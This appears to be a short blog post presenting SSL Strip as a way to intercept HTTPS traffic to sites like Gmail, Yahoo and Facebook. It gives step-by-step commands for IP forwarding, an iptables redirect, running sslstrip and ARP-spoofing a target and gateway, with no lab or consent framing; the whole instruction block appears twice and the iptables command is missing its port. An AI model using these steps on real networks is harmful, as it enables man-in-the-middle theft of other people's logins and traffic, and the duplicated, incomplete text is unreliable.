If you want to sniff websites having https environment then you should try SSL Strip it helps you to sniff https sites. Like Gmail Yahoo And Facebook.
Setup
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip
Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.
Setup
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip
Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.
No comments:
Post a Comment